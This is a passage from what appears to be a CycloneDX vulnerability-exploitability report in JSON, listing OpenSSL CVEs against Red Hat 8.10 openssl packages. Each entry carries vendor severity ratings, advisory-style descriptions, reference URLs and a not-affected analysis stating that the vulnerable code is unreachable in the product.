          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-42766",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: A specially crafted password-encrypted CMS message\ncan trigger a NULL pointer dereference during CMS decryption.\n\nImpact summary: This NULL pointer dereference leads to an application crash\nand a Denial of Service.\n\nThe CMS PasswordRecipientInfo.keyDerivationAlgorithm field is defined as\nOPTIONAL in the ASN.1 specification and may therefore be absent in specially\ncrafted inputs. During the password-based CMS decryption the OpenSSL\nCMS implementation dereferences this field without first checking whether it\nwas present.\n\nAn attacker who supplies such a CMS message to an application performing\npassword-based CMS decryption can trigger an application crash, leading to\na Denial of Service.\n\nApplications that process password-encrypted CMS messages may be affected.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42766"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25237"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25239"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42766"
        },
        {
          "url": "https://bugzilla.redhat.com/2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/2481898"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481898"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-25237.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:25239"
        },
        {
          "url": "https://github.com/advisories/GHSA-58mv-qqmv-gqgv"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/056d06c1918fafbb98c1c85a02e4c47cc4e199ce"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/12bc26ffb3a2be728c9b86e1cae277de5b33dfa4"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/3ff64913615d648cfbb6a6f1cf5529ae7ea829d7"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/ab52d88cb5374876d59aee3c91f9e4ccce2b7ce4"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/da26f368732b83e40e9d356fe61c3d3aaab6d2e8"
        },
        {
          "url": "https://github.com/openssl/security/commit/056d06c1918fafbb98c1c85a02e4c47cc4e199ce"
        },
        {
          "url": "https://github.com/openssl/security/commit/12bc26ffb3a2be728c9b86e1cae277de5b33dfa4"
        },
        {
          "url": "https://github.com/openssl/security/commit/3ff64913615d648cfbb6a6f1cf5529ae7ea829d7"
        },
        {
          "url": "https://github.com/openssl/security/commit/ab52d88cb5374876d59aee3c91f9e4ccce2b7ce4"
        },
        {
          "url": "https://github.com/openssl/security/commit/da26f368732b83e40e9d356fe61c3d3aaab6d2e8"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-42766.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50379.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42766"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42766"
        }
      ],
      "published": "2026-06-09T17:17:07+00:00",
      "updated": "2026-07-23T08:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-42768",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        514
      ],
      "description": "Issue summary: The CMS_decrypt and PKCS7_decrypt functions are vulnerable to\nBleichenbacher-style attack when an attacker is able to provide the CMS or\nS/MIME messages and observe the error code and/or decryption output.\n\nImpact summary: The Bleichenbacher-style attack allows an attacker to use the\nvictim's vulnerable application as a way to decrypt or sign messages with the\nvictim's private RSA key.\n\nThe attack is possible in 2 variants.\n\n1. The decryption API (CMS_decrypt(), PKCS7_decrypt()) is used without\nproviding the recipient certificate. In this case OpenSSL iterates over every\nKeyTransRecipientInfo (KTRI) without stopping at the first success.\n\nAn attacker who authors a message with two KTRI entries \u2014 the first one\nwrapping a real CEK under the victim's public key, the second with an\narbitrary probe ciphertext \u2014 obtains opportunity to iterate the 2nd KTRI to\nget a valid PKCS#1 v1.5 padding if the error code of the application is\navailable.\n\nThat is a Bleichenbacher oracle (Bleichenbacher, CRYPTO '98): an\nadaptive-chosen-ciphertext side channel from which the attacker decrypts any\nRSA ciphertext to the victim's key or forges any PKCS#1 v1.5 signature under\nit.\n\n2. When the decryption API (CMS_decrypt(), PKCS7_decrypt()) is provided with\nthe recipient certificate, and the recipient is not found, a random\nkey is substituted.\n\nAn attacker who authors a message and is able to compare both error code and\nthe result of the decryption, can mount a Bleichenbacher oracle.\n\nWe are not aware of any applications that provide a remote attacker\nan opportunity to mount an attack described in these scenarios. We consider\nthe existence of such application very unlikely, and for this reason this\nCVE has been evaluated as Low severity.\n\nTo avoid these attacks, when RSA PKCS#1 v1.5 Key Transport is in use, the\ninvoked EVP_PKEY_decrypt() will use the implicit rejection mechanism described\nin draft-irtf-cfrg-rsa-guidance. In previous OpenSSL releases the implicit\nrejection was explicitly disabled.\n\nThe implicit rejection mechanism always returns a plaintext value,\nthe symmetric key. This result is deterministic for the ciphertext and the\nprivate key.  The length of the decryption result can happen to match the\nlength of the key of the symmetric cipher that was used for the content\nencryption. When a certificate is not provided, the last RecipientInfo\nproducing a key that looks valid will be used. It may cause getting garbage\ncontent on decryption. As a proper way to deal with this a recipient\ncertificate has to be provided to identify the particular RecipientInfo for\ndecryption.\n\nThe FIPS modules in 4.0, 3.6, 3.5, and 3.4 are not affected by this issue, as\nCMS and S/MIME processing happens outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42768"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25237"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25239"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42768"
        },
        {
          "url": "https://bugzilla.redhat.com/2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/2481898"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481898"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-25237.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:25239"
        },
        {
          "url": "https://github.com/advisories/GHSA-5m8f-m8jv-3rp3"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a2ca7b2d73e0ffc1eae183fe6e1741dac767cb4f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/bbb151a83041705d9d001ed2f9c12f5523e1b54d"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/dd68364107a58841c0a2546812518b65d3a23abd"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/f04b377be3d821741c86d1f4bf84dee09f3d5c3e"
        },
        {
          "url": "https://github.com/openssl/security/commit/a2ca7b2d73e0ffc1eae183fe6e1741dac767cb4f"
        },
        {
          "url": "https://github.com/openssl/security/commit/bbb151a83041705d9d001ed2f9c12f5523e1b54d"
        },
        {
          "url": "https://github.com/openssl/security/commit/dd68364107a58841c0a2546812518b65d3a23abd"
        },
        {
          "url": "https://github.com/openssl/security/commit/f04b377be3d821741c86d1f4bf84dee09f3d5c3e"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-42768.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50379.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42768"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42768"
        }
      ],
      "published": "2026-06-09T17:17:08+00:00",
      "updated": "2026-07-23T08:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
